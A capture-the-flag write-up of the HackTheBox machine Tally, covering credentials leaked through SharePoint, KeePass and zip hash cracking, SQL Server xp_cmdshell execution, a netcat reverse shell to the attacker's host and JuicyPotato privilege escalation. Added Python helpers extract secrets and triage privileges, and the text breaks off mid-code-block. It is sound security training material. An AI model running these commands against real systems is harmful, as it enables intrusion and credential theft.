# HTB - Tally

![Tally](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4RyE4ePbWwlhDCP6ts%2F-M4S71uRIhcTMLSXHKYC%2Fimage.png?alt=media\&token=c9361164-580c-4c32-8212-62bc34461373)

## Getting Root

1. The SharePoint site on port 80 exposes its document libraries without authentication; a document in **Documents** holds the FTP password and the **Finance Team** site page reveals the username **`ftp_user`**.
2. On the FTP server we find a **KeePass** database, `tim.kdbx`; cracking its master password gives the **Finance** SMB credentials. The `ACCT` share contains a password-protected zip with an Orchard CMS database dump (clear-text CMS admin password) and a `tester.exe` whose embedded connection string holds the **`sa`** password for the **SQL** server, which gives command execution through **xp\_cmdshell**.
3. xp\_cmdshell runs as **sarah**, who holds **`SeImpersonatePrivilege`**; on this Server 2016 build that is straightforward to abuse with **Rotten Potato/JuicyPotato** for a SYSTEM shell.

### Tools Used:

**`nmap, dirsearch.py, keepass2john, zip2john, impacket-mssqlclient.py, impacket-smbserver, juicypotato`**

## Nmap

```bash
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 20:22 EDT                                                                                                                               
Nmap scan report for tally.htb (10.10.10.59)                                                                                                                                                  
Host is up (0.12s latency).                                                                                                                                                                   
                                                                                                                                                                                              
PORT      STATE SERVICE            VERSION                                                                                                                                                    
21/tcp    open  ftp                Microsoft ftpd                                                                                                                                             
| ftp-syst:                                                                                                                                                                                   
|_  SYST: Windows_NT                                                                                                                                                                          
80/tcp    open  http               Microsoft IIS httpd 10.0                                                                                                                                   
| http-ntlm-info:                                                                                                                                                                             
|   Target_Name: TALLY                                                                                                                                                                        
|   NetBIOS_Domain_Name: TALLY                                                                                                                                                                
|   NetBIOS_Computer_Name: TALLY                                                                                                                                                              
|   DNS_Domain_Name: TALLY                                                                                                                                                                    
|   DNS_Computer_Name: TALLY                                                                                                                                                                  
|_  Product_Version: 10.0.14393                                                                                                                                                               
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                      
| http-title: Home                                                                                                                                                                            
|_Requested resource was http://tally.htb/_layouts/15/start.aspx#/default.aspx                                                                                                                
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_http-title: Bad Request                                                                                                                                                                     
135/tcp   open  msrpc              Microsoft Windows RPC                                                                                                                                      
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn                                                                                                                              
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds                                                                                                       
808/tcp   open  ccproxy-http?                                                                                                                                                                 
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM                                                                                                               
| ms-sql-ntlm-info:                                                                                                                                                                           
|   Target_Name: TALLY                                                                                                                                                                        
|   NetBIOS_Domain_Name: TALLY                                                                                                                                                                
|   NetBIOS_Computer_Name: TALLY                                                                                                                                                              
|   DNS_Domain_Name: TALLY                                                                                                                                                                    
|   DNS_Computer_Name: TALLY                                                                                                                                                                  
|_  Product_Version: 10.0.14393                                                                                                                                                               
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback                                                                                                                                      
| Not valid before: 2020-04-05T22:22:49                                                                                                                                                       
|_Not valid after:  2050-04-05T22:22:49                                                                                                                                                       
|_ssl-date: 2020-04-06T00:25:52+00:00; +56s from scanner time.                                                                                                                                
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_http-title: Not Found                              
15567/tcp open  http               Microsoft IIS httpd 10.0                                                                                                                                   
| http-auth:                                                                                                                                                                                  
| HTTP/1.1 401 Unauthorized\x0D                                                                                                                                                               
|   Negotiate                                                                                                                                                                                 
|_  NTLM                                                                                                                                                                                      
| http-ntlm-info:                                                                                                                                                                             
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2020-04-06T00:25:51+00:00; +55s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  unknown
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 55s, deviation: 0s, median: 54s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-06T00:25:00
|_  start_date: 2020-04-05T22:22:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.20 seconds

```

## Enumeration

### HTTP - Port 80

#### Dirsearch.py

```bash
#python3 /opt/dirsearch/dirsearch.py -u http://tally.htb -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -E                                                               
                                                                                                                                                                                              
 _|. _ _  _  _  _ _|_    v0.3.9                                                                                                                                                               
(_||| _) (/_(_|| (_| )                                                                                                                                                                        
                                                                                                                                                                                              
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 1708                                                                                  
                                                                                                                                                                                              
Error Log: /opt/dirsearch/logs/errors-20-04-05_23-09-45.log                                                                                                                                   
                                                                                                                                                                                              
Target: http://tally.htb  
[23:16:08] 302 -  143B  - /_layouts/viewedit.aspx  ->  /_layouts/15/viewedit.aspx                                                                                                             
[23:16:08] 302 -  143B  - /_layouts/viewlsts.aspx  ->  /_layouts/15/viewlsts.aspx                                                                                                             
[23:16:08] 302 -  143B  - /_layouts/versions.aspx  ->  /_layouts/15/versions.aspx 
```

Visiting `/_layouts/viewlsts.aspx` (which redirects to `/_layouts/15/viewlsts.aspx`) returns the site contents page, listing every library and page on the site:

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CY9IewcJeqsV_qeVL%2F-M4CYwPIJsKqv4_XWTXC%2Fimage.png?alt=media\&token=c667656c-d05f-4f78-b593-9992d342d6ce)

### Found Documents with Credentials

The **Documents** library holds a file with the FTP connection details:

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CZTSxaRhtWrJST0q3%2F-M4C_UMb7m7PYbYb1cAR%2Fimage.png?alt=media\&token=5bce0353-e77e-4fec-8ece-28fc7b25143d)

FTP details:

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CZTSxaRhtWrJST0q3%2F-M4C_fct_ueRykJw8v2q%2Fimage.png?alt=media\&token=19e01f8b-91af-432b-9efb-a307b7d2ffd2)

Password: **`UTDRSCH53c"$6hys`**

Under **Site Pages** there is a page named **Finance Team**:

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CcCCFcmb1OpKTUmsL%2F-M4Cpu96S8kb_zoN03DL%2Fimage.png?alt=media\&token=d4296bf5-5e30-457a-b233-d2f8489fdd56)

Its contents reveal the FTP username, **`ftp_user`**:

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CcCCFcmb1OpKTUmsL%2F-M4Cq5pnQAJfV9Nt26kb%2Fimage.png?alt=media\&token=5182a734-3484-4a04-97b2-68985123cbc3)

### FTP - Port 21

Logging in as **`ftp_user`** with the password from the document works (note the single quotes around the password, since it contains `"` and `$`).

```bash
# ncftp -u ftp_user -p 'UTDRSCH53c"$6hys' 10.10.10.59
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.59...                                                                                                                                                                  
Microsoft FTP Service
Logging in...                                                                                                                                                                                 
User logged in.
Logged in to 10.10.10.59.                                                                                                                                                                     
ncftp / > ls
From-Custodian/  Intranet/        Logs/            To-Upload/       User/
ncftp / > 

```

### Found KeePass File

Under **`/User/Tim/Files`** there is a KeePass database named **`tim.kdbx`**, next to a KeePass 2.36 install and a `bonus.txt`:

```bash
ncftp /User/Tim > cd Files/                                                                                                                                                                   
ncftp /User/Tim/Files > ls                                                                                                                                                                    
bonus.txt      KeePass-2.36/  tim.kdbx    
```

### Cracking the KeePass password

```bash
# keepass2john tim.kdbx > tim_hash
# sudo john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt tim_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo    (tim)
1g 0:00:00:11 DONE (2020-04-06 01:09) 0.08718g/s 2153p/s 2153c/s 2153C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed

```
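The `Cost 1 (iteration count) is 6000` line in the john output is not something john guesses: keepass2john reads it from the `TransformRounds` field of the database's outer header, and a low round count is exactly what makes a rockyou run feasible at the ~2,150 candidates/s observed above. The parser below, added here as an example and not part of the original write-up, walks a KDBX 3.1 header (the format KeePass 2.36 writes) and reports the cipher and AES-KDF round count, then scales the observed cracking rate to other round counts. The header bytes are constructed, not taken from `tim.kdbx`, and the rate figures are only the ones john printed on this box.

```python
"""Read the KDF cost out of a KDBX 3.1 (KeePass 2.x) outer header.

Added example, not part of the original write-up. keepass2john derives
"Cost 1 (iteration count)" from the TransformRounds header field; this parser
reads the same field directly. SAMPLE_HEADER is constructed to look like a
database with 6000 AES-KDF rounds; it is not tim.kdbx.
"""
import struct

KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67
CIPHER_NAMES = {
    bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"): "AES-256-CBC",
    bytes.fromhex("ad68f29f576f4bb9a36ad47af965346c"): "ChaCha20",
}
# KDBX 3.x outer header fields: 1-byte id, 2-byte little-endian length, data
F_END, F_CIPHER, F_COMPRESSION, F_MASTER_SEED = 0, 2, 3, 4
F_TRANSFORM_SEED, F_TRANSFORM_ROUNDS, F_ENCRYPTION_IV = 5, 6, 7


def parse_kdbx3_header(data: bytes) -> dict:
    """Return format version, cipher and AES-KDF round count of a KDBX 3.x file."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX file")
    if major != 3:
        # KDBX 4 switched to 4-byte field lengths and a VariantDictionary
        # (field 11) for KDF parameters, so it needs a different walker
        raise ValueError(f"unsupported KDBX major version {major}")
    info = {"version": f"{major}.{minor}", "cipher": None, "rounds": None}
    off = 12
    while off + 3 <= len(data):
        field_id, length = struct.unpack_from("<BH", data, off)
        off += 3
        value = data[off:off + length]
        off += length
        if field_id == F_END:
            return info
        if field_id == F_CIPHER:
            info["cipher"] = CIPHER_NAMES.get(value, value.hex())
        elif field_id == F_TRANSFORM_ROUNDS:
            (info["rounds"],) = struct.unpack("<Q", value)
    raise ValueError("truncated header: no EndOfHeader field")


def estimate_seconds(rounds: int, candidates: int,
                     observed_rate: float = 2153.0, observed_rounds: int = 6000) -> float:
    """Scale john's observed rate (2153 p/s at 6000 rounds on this box) to
    another round count; AES-KDF cost is linear in the number of rounds."""
    rate = observed_rate * observed_rounds / rounds
    return candidates / rate


def build_sample_header(rounds: int, major: int = 3, minor: int = 1) -> bytes:
    """Construct a minimal KDBX header (test data only, no encrypted payload)."""
    def field(fid: int, payload: bytes) -> bytes:
        return struct.pack("<BH", fid, len(payload)) + payload
    hdr = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, minor, major)
    hdr += field(F_CIPHER, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))
    hdr += field(F_COMPRESSION, struct.pack("<I", 1))      # 1 = gzip
    hdr += field(F_MASTER_SEED, b"\x11" * 32)
    hdr += field(F_TRANSFORM_SEED, b"\x22" * 32)
    hdr += field(F_TRANSFORM_ROUNDS, struct.pack("<Q", rounds))
    hdr += field(F_ENCRYPTION_IV, b"\x33" * 16)
    hdr += field(F_END, b"\r\n\r\n")
    return hdr


SAMPLE_HEADER = build_sample_header(6000)   # constructed; mimics tim.kdbx's cost

if __name__ == "__main__":
    info = parse_kdbx3_header(SAMPLE_HEADER)
    rockyou = 14_300_000                      # approximate line count of rockyou.txt
    hours = estimate_seconds(info["rounds"], rockyou) / 3600
    print(info, f"full rockyou at this cost: ~{hours:.1f} h")
```

Run it against a real file with `parse_kdbx3_header(open("tim.kdbx", "rb").read())`; a database with ten times the rounds would take ten times as long per candidate, which is the point of raising the KDF cost (or moving to Argon2 in KDBX 4).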

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M4CuAJZCSBLyDj1K9Hv%2F-M4CvlNzL-efbca2hbX6%2Fimage.png?alt=media\&token=cb6f120c-d6fc-42ae-a18b-e7a6efc40865)

The entry shown above (from `tim.kdbx` opened with the cracked master password **`simplementeyo`**) gives:

**`Username: Finance`**\
**`Password: Acc0unting`**

### SMB - Port 445

Validating the credentials with CrackMapExec succeeds, and the `finance` account has read access to the non-default **`ACCT`** share (the banner also shows SMB signing is not required and SMBv1 is enabled):

```bash
# crackmapexec smb 10.10.10.59 -u finance -p Acc0unting --shares
SMB         10.10.10.59     445    TALLY            [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB         10.10.10.59     445    TALLY            [+] TALLY\finance:Acc0unting 
SMB         10.10.10.59     445    TALLY            [+] Enumerated shares
SMB         10.10.10.59     445    TALLY            Share           Permissions     Remark
SMB         10.10.10.59     445    TALLY            -----           -----------     ------
SMB         10.10.10.59     445    TALLY            ACCT            READ            
SMB         10.10.10.59     445    TALLY            ADMIN$                          Remote Admin
SMB         10.10.10.59     445    TALLY            C$                              Default share
SMB         10.10.10.59     445    TALLY            IPC$                            Remote IPC

```

### Found a zipfile

Browsing the **`ACCT`** share with smbclient, the migration backup directory contains a small zip:

```bash
smb: \zz_Migration\Backup\20170808\orcharddb\> ls                                                                                                                                             
  .                                   D        0  Sun Sep  3 10:23:16 2017                                                                                                                    
  ..                                  D        0  Sun Sep  3 10:23:16 2017                                                                                                                    
  orcharddb.zip                       A     1012  Sun Sep  3 10:23:07 2017   
```

### Cracking the zipfile

```bash
# zip2john orcharddb.zip > orchard_hash
# john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt orchard_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Acc0unting       (orcharddb.zip/orcharddb.sql)
1g 0:00:00:00 DONE (2020-04-06 02:24) 1.010g/s 11551Kp/s 11551Kc/s 11551KC/s Aimeerose83..Abdouhabibi
Use the "--show" option to display all of the cracked passwords reliably
Session completed

```

The zip is protected with the same password as the Finance account (**`Acc0unting`**), a reuse worth noting. It contains `orcharddb.sql`, a dump of the Orchard CMS database, whose user table stores the CMS `admin` password unhashed: `PasswordFormat` is `Clear` and the `Password` column holds **`Finance2`** directly, so the `HashAlgorithm` and `PasswordSalt` columns are meaningless for this row.

```bash
([Id], [UserName], [Email], [NormalizedUserName], [Password], [PasswordFormat], [HashAlgorithm], [PasswordSalt], [RegistrationStatus], [EmailStatus], [EmailChallengeToken])  
(2, N'admin', N'', N'admin', N'Finance2', N'Clear', N'SHA1', N's2Ieb5Pn7Vwf+X6JEXJitg==', N'Approved', N'Approved', NULL)
```

### Found **tester.exe**

```bash
smb: \zz_Migration\Binaries\New Folder\> ls
  .                                   D        0  Thu Sep 21 02:21:09 2017
  ..                                  D        0  Thu Sep 21 02:21:09 2017
  crystal_reports_viewer_2016_sp04_51051980.zip      A 389188014  Wed Sep 13 15:56:38 2017
  Macabacus2016.exe                   A 18159024  Mon Sep 11 17:20:05 2017
  Orchard.Web.1.7.3.zip               A 21906356  Tue Aug 29 19:27:42 2017
  putty.exe                           A   774200  Sun Sep 17 16:19:26 2017
  RpprtSetup.exe                      A   483824  Fri Sep 15 15:49:46 2017
  tableau-desktop-32bit-10-3-2.exe      A 254599112  Mon Sep 11 17:13:14 2017
  tester.exe                          A   215552  Fri Sep  1 07:15:54 2017
  vcredist_x64.exe                    A  7194312  Wed Sep 13 16:06:28 2017

                8387839 blocks of size 4096. 714594 blocks available
smb: \zz_Migration\Binaries\New Folder\> get tester.exe 
getting file \zz_Migration\Binaries\New Folder\tester.exe of size 215552 as tester.exe (357.4 KiloBytes/sec) (average 357.4 KiloBytes/sec)
smb: \zz_Migration\Binaries\New Folder\> 



# strings tester.exe
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; 
```

#### Creds:

**`sa:GWE3V65#6KFH93@4GWTG2G`**
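`strings` found the `sa` password because `tester.exe` embeds a complete ODBC connection string in plain text. The script below, added here as an example and not part of the original write-up, automates that check: it pulls printable runs out of a binary (ASCII and UTF-16LE, since .NET binaries store their strings as UTF-16), keeps only the ones that look like a connection string, and parses out server, database, user and password. `SAMPLE_BINARY` is constructed test data with placeholder passwords, not bytes from `tester.exe`.

```python
"""Find embedded database connection strings in a binary, as `strings` did for tester.exe.

Added example, not part of the original write-up. SAMPLE_BINARY is constructed:
junk bytes around an ODBC-style string (ASCII) and an ADO.NET-style string
(UTF-16LE, as .NET binaries store them), with placeholder passwords.
"""
import re

ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")            # what `strings` prints
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")    # what `strings -el` prints
# Keys that mark a connection string (ODBC, ADO.NET and Data Source= styles)
CONN_KEY = re.compile(r"(?i)\b(?:driver|server|data source|uid|user id|pwd|password)\s*=")


def extract_strings(blob: bytes) -> list:
    """Printable runs of 8+ chars, ASCII first then UTF-16LE, like `strings -a -el`."""
    out = [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    out += [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]
    return out


def parse_conn_string(s: str) -> dict:
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    fields = {}
    for part in s.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def find_db_secrets(blob: bytes) -> list:
    """Return every embedded connection string that carries a password."""
    hits = []
    for s in extract_strings(blob):
        if not CONN_KEY.search(s):
            continue
        f = parse_conn_string(s)
        password = f.get("pwd") or f.get("password")
        if not password:
            continue
        hits.append({
            "server": f.get("server") or f.get("data source"),
            "database": f.get("database") or f.get("initial catalog"),
            "user": f.get("uid") or f.get("user id"),
            "password": password,
        })
    return hits


# Constructed test data, not bytes from tester.exe
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=Example!Pass1;"
    + b"\x00\x01\x02\x03"
    + "Server=db01;Database=hr;User Id=svc_hr;Password=Hr-Sample-2;".encode("utf-16-le")
    + b"\x00\x00"
    + b"This program cannot be run in DOS mode."
)

if __name__ == "__main__":
    for hit in find_db_secrets(SAMPLE_BINARY):
        print(hit)
```

Point it at a real file with `find_db_secrets(open("tester.exe", "rb").read())`; the UTF-16 pass is the one plain `strings` misses by default, and it is where .NET tooling usually keeps this kind of secret.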

## Exploitation:

```bash
python /opt/impacket/examples/mssqlclient.py sa:'GWE3V65#6KFH93@4GWTG2G'@10.10.10.59 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665) 
[!] Press help for extra shell commands
SQL> 

```

### Getting a shell

```bash
SQL> help                                                                                                                                                                                     
                                                                                                                                                                                              
     lcd {path}                 - changes the current local directory to {path}                                                                                                               
     exit                       - terminates the server process (and this session)                                                                                                            
     enable_xp_cmdshell         - you know what it means                                                                                                                                      
     disable_xp_cmdshell        - you know what it means                                                                                                                                      
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell                                                                                                                              
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)                                                                                                             
     ! {cmd}                    - executes a local shell cmd                                                                                                                                  
                                                                                                                                                                                              
SQL> enable_xp_cmdshell                                                                                                                                                                       
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.                                                        
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.                                                                  
SQL> enable_xp_cmdshell 1                                                                                                                                                                     
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.                                                        
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.                                                                  
SQL> RECONFIGURE     
SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

tally\sarah                                                                        

                               
```

Note that impacket's `enable_xp_cmdshell` already runs `sp_configure` for both options followed by `RECONFIGURE`; the second call (with the stray `1` argument) and the manual `RECONFIGURE` are harmless but unnecessary, and the "Run the RECONFIGURE statement" messages are simply `sp_configure` reporting before the `RECONFIGURE` in the same batch executes. With command execution as the service account, copy **nc.exe** to the box through an SMB share served by **impacket-smbserver** (SMBv1 is enabled on this host, as the CrackMapExec banner showed; against a host with SMBv1 disabled add `-smb2support`):

```bash
# On the Kali box: serve the current directory as an SMB share called "share"
impacket-smbserver share $(pwd)

# On Tally, through xp_cmdshell: map the share, copy nc.exe over and call back
SQL> xp_cmdshell net use p: \\10.10.14.55\share
SQL> xp_cmdshell copy p:\nc.exe c:\temp
SQL> xp_cmdshell c:\temp\nc.exe -e cmd.exe 10.10.14.55 9001

# On the Kali box, the listener catches the shell
rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49907.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

## Privilege Escalation

The shell runs as **sarah**, the account the SQL Server service runs under. She holds **`SeImpersonatePrivilege`** (and **`SeAssignPrimaryTokenPrivilege`**), which is what the Potato family abuses: coerce a SYSTEM DCOM activation into authenticating to a local listener, then impersonate the resulting token. Since this is build 14393 (Server 2016), **JuicyPotato** still works; on Windows 10 1809 / Server 2019 and later the DCOM path is blocked and PrintSpoofer or RoguePotato are needed instead.

```bash
c:\TEMP>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


```
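Reading `whoami /priv` by eye works for six lines, but the same triage is worth scripting for the long privilege tables a service account can carry. The snippet below, added here as an example and not part of the original write-up, parses the table above, flags the privileges with a known path to SYSTEM, and applies the JuicyPotato rule of thumb (token privilege present plus a pre-1809 build). `WHOAMI_OUTPUT` is the sarah output from this page; the `ABUSABLE` map and the build cut-off are my own summary of commonly used tradecraft, not an exhaustive reference.

```python
"""Triage `whoami /priv` output for privileges with a known path to SYSTEM.

Added example, not part of the original write-up. WHOAMI_OUTPUT is the table
from the sarah shell above; the ABUSABLE map and the build cut-off are
rules of thumb, not an exhaustive reference.
"""
import re

# privilege -> (why it matters, usual tooling)
ABUSABLE = {
    "SeImpersonatePrivilege": ("impersonate a SYSTEM token coerced via DCOM/RPC", "JuicyPotato, RoguePotato, PrintSpoofer"),
    "SeAssignPrimaryTokenPrivilege": ("start a process with a coerced primary token", "JuicyPotato (CreateProcessAsUser)"),
    "SeBackupPrivilege": ("read any file, e.g. the SAM and SYSTEM hives", "reg save, robocopy /b"),
    "SeRestorePrivilege": ("write any file, e.g. a service binary", "file overwrite, symlink tricks"),
    "SeDebugPrivilege": ("open any process, dump LSASS", "mimikatz, procdump"),
    "SeTakeOwnershipPrivilege": ("take ownership of any securable object", "takeown, icacls"),
    "SeLoadDriverPrivilege": ("load a kernel driver", "vulnerable signed driver abuse"),
}
JUICYPOTATO_MAX_BUILD = 17762   # the DCOM trick stops working on 1809 / Server 2019 (17763+)

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(text: str) -> dict:
    """Map privilege name -> True if Enabled, False if Disabled (held either way)."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def triage(privs: dict) -> list:
    """Return held privileges that are on the abusable list, most useful first.
    A 'Disabled' state only means not enabled in this token; a process can
    enable any privilege it holds with AdjustTokenPrivileges, so it still counts."""
    order = list(ABUSABLE)
    found = sorted((p for p in privs if p in ABUSABLE), key=order.index)
    return [{"privilege": p, "enabled": privs[p],
             "impact": ABUSABLE[p][0], "tools": ABUSABLE[p][1]} for p in found]


def juicypotato_viable(privs: dict, build: int) -> bool:
    """Rule of thumb: JuicyPotato needs SeImpersonate or SeAssignPrimaryToken
    and a pre-1809 build such as 14393 (Server 2016, as on Tally)."""
    token_priv = "SeImpersonatePrivilege" in privs or "SeAssignPrimaryTokenPrivilege" in privs
    return token_priv and build <= JUICYPOTATO_MAX_BUILD


# Output of `whoami /priv` in the sarah shell, copied from the write-up
WHOAMI_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    privs = parse_whoami_priv(WHOAMI_OUTPUT)
    for finding in triage(privs):
        print(finding)
    print("JuicyPotato viable on build 14393:", juicypotato_viable(privs, 14393))
```

Feed it the saved output of `whoami /priv` from any foothold; the build number to pass is the one in the `Microsoft Windows [Version 10.0.14393]` banner the shell prints.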

We copied **JuicyPotato** to the target the same way as **nc.exe**. The first CLSID we tried did not give a shell: JuicyPotato needs a COM server that runs as SYSTEM and whose activation the current user is allowed to trigger, so the CLSID has to match the target's OS build, and the list at <http://ohpe.it/juicy-potato/CLSID/> is the place to pick candidates for the OS version in hand. Two CLSIDs worked here:

- **`UsoSvc`**: CLSID **`{E7299E79-75E5-47BB-A03D-6D319FB7F886}`**, AppID **`{B91D5831-B1BD-4608-8198-D72E155020F7}`**
- **`{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}`**, the one used in the transcript below

`-t *` tells JuicyPotato to try both `CreateProcessWithTokenW` and `CreateProcessAsUser`, `-l` is the local COM listener port, and `-p`/`-a` are the program and arguments to launch with the stolen token.

```bash
